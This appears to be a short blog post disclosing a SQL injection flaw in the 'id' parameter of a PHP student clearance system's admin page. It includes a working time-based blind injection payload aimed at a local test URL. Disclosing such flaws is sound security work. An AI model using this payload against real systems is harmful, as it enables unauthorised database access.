Web-Based Student Clearance System is vulnerable to a SQL Injection(edit-admin.php)

靳亚东

于 2022-10-27 15:16:33 发布

阅读量2.9k

点赞数

文章标签： php sql mysql

本文链接：https://blog.csdn.net/qq_41988749/article/details/127552717

版权

Web-Based Student Clearance System存在SQL注入漏洞，在edit-admin.php文件中，URI参数‘id’易受攻击。该文件第32行调用的SQL查询使用了不可信来源的输入，攻击者可能借此修改语句含义或执行任意SQL命令。还提供了代码下载链接。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Web-Based Student Clearance System is vulnerable to a SQL Injection(edit-admin.php)
url:/Admin/edit-admin.php
URI parameter ‘id’ is vulnerable

Line 32 of edit-admin.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.

在这里插入图片描述

Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://127.0.0.1:80/student_clearance_system_Aurthur_Javis/admin/edit-admin.php?id=5' AND (SELECT 2846 FROM (SELECT(SLEEP(5)))sOPo) AND 'uvpP'='uvpP

在这里插入图片描述
Download Code:
https://www.sourcecodester.com/php/15627/web-based-student-clearance-system.html